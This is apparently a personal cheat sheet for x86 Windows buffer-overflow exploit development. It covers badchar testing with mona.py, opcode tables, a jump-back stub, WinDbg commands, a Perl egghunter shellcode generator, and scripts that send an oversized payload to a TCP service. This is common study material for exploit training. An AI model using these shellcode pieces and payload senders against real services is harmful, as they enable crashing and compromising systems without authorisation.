Quick reference for exploit development. Search the page and find what you need.
- Badchars
- ASM x86
- Debuggers
- Egghunter by Matt Miller
- Convert file to binary string
- Sending the payload
Badchars
All possible hex characters
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"+
"\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"+
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"+
"\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"+
"\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f"+
"\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"+
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f"+
"\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"+
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f"+
"\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"+
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf"+
"\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"+
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf"+
"\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"+
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"+
"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
You can probably remove \x00 before testing.
Find badchars with mona.py
Generate bytearray:
!mona bytearray -b "\x00"
Compare memory at crash with previously generated bytearray:
!mona compare -f bytearray.bin
ASM
Registers
EAX: Arithmetical and Logical Instructions
EBX: Base Pointer for Memory Address
ECX: Loop, Shift, Rotation Counter
EDX: I/O Port Addressing, Multiplication, Division
ESI: Pointer of data source in string copy operations
EDI: Pointer of data destination in string copy operations
| 32-bit | Low 16 bits | High 8 bits | Low 8 bits |
|---|---|---|---|
| EAX | AX | AH | AL |
| EBX | BX | BH | BL |
| ECX | CX | CH | CL |
| EDX | DX | DH | DL |
| ESI | SI | N/A | N/A |
| EDI | DI | N/A | N/A |
| EBP | BP | N/A | N/A |
| ESP | SP | N/A | N/A |
| EIP | IP | N/A | N/A |
Jumps
Jumps to registers
| Instruction | OP Codes |
| jmp eax | \xff\xe0 |
| jmp ecx | \xff\xe1 |
| jmp edx | \xff\xe2 |
| jmp ebx | \xff\xe3 |
| jmp esp | \xff\xe4 |
| jmp ebp | \xff\xe5 |
| jmp esi | \xff\xe6 |
| jmp edi | \xff\xe7 |
Arbitrary jump back
Jumps back 512 bytes from current instruction:
[BITS 32]
global _start
_start:
# ;--- copy eip into ecx
# ;--- Taken from Phrack #62 Article 7 Originally written by Aaron Adams
# http://phrack.org/issues/62/7.html (search the page for Aaron Adams)
fldz
fnstenv [esp-12]
pop ecx
add cl, 10
nop
# ;--- Decrease ecx and jump to it
dec ch ; ecx=-256;
dec ch ; ecx=-256;
jmp ecx ;
Math
Clear a register
| Instruction | OP Codes |
| xor eax,eax | \x31\xc0 |
| xor ebx,ebx | \x31\xdb |
| xor edx,edx | \x31\xd2 |
| xor edx,edx | \x31\xc9 |
| xor ebp,ebp | \x31\xed |
| xor esi,esi | \x31\xf6 |
| xor edi,edi | \x31\xff |
Stack
| Register | POP | PUSH |
| eax | \x58 | \x50 |
| ecx | \x59 | \x51 |
| edx | \x5a | \x52 |
| ebx | \x5b | \x53 |
| esp | \x5c | \x54 |
| ebp | \x5d | \x55 |
| esi | \x5e | \x56 |
| edi | \x5f | \x57 |
Debuggers
WinDbg
g continue
u unassemble
u Kernel32!GetCurrentThread
db display bytes
db esp L<#Lines>
db esp L10
dw display words
dd display dwords
dq display qwords
dW display words ascii
dc display dwords ascii
dt display types
dt ntdll!_TEB
?? sizeof(ntdll!_TEB)
ed edit
ed esp 41414141
ea esp “Hello”
s search
s -d 0 L?80000000 41414141
s -a 0 L?80000000 “Error message”
r dump all registers
r ecx
r ecx=41414141
bp set breakpoint
bl list breakpoints
bd disable breakpoint
be enable breakpoint
bc clear breakpoint
bc *
bu set breakpoint on unresolved functions
p one step, skip calls
t step in function calls
pt step to next return
ph step to next branch
lm list modules
lm m kernel*
x examine symbols
x kernelbase!CreateProc*
? address - address
? address >> 18
? hex (to decimal)
? 0nDEC (to hex)
? 0yBIN (to dec and hex)
.formats 4141414141
.cls
sxd av disable access violation pause
sxd gp disable guard pages
!analyze -v analyze a crash
k show stack trace
Egg hunter by Matt Miller
You can use the following script to generate an egghunter code.
#!/usr/bin/perl
# Prints egghunter code to be pasted into an exploit.
# Example:
# $ ./egghunter.pl 41424344
use strict;
use warnings;
# This is the egghunter implementation by Matt Miller, $ARGV[0] will be placed instead of the egg
my $egghunter = "\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\\x%s\\x%s\\x%s\\x%s\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7";
my $egg = $ARGV[0];
my @chars = ($egg =~ m/../g);
printf($egghunter, @chars);
print("\n");
I keep a gist with this simple perl script, in the future there might be a less minimal version here:
Convert file to binary string
You can use the following script to convert any binary file compiled with nasm into a binary string that can be pasted into an exploit:
#!/usr/bin/perl
use strict;
use warnings;
my $file = $ARGV[0];
open my $fh, '<:raw', $file;
while(my $bytes_read = read $fh, my $bytes, 1) {
printf("\\x%02x", ord($bytes));
}
printf("\n");
close($file);
I keep a gist with this simple perl script, in the future there might be a less minimal version here:
Use it with:
$ nasm jmpesp.bin
$ ./file2payload.pl jmpesp
\xff\xe4
Sending the payload
Perl
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket::INET;
my $host = "192.168.1.121";
my $port = 9999;
my $payload = "A" x 5000;
my $sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp');
$sock->send("COMMAND " . $payload . "\n");
close $sock;
Python
#!/usr/bin/python
import socket
target = "192.168.1.121"
port = 9999
payload = "A" * 5000
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.send("COMMAND " + payload + "\n")
s.close()
Ruby
#!/usr/bin/ruby
require 'socket'
target = '192.168.1.121'
port = 9999
payload = "A" * 5000
s = TCPSocket.open(target, port)
s.puts('COMMAND ' + payload)
s.close()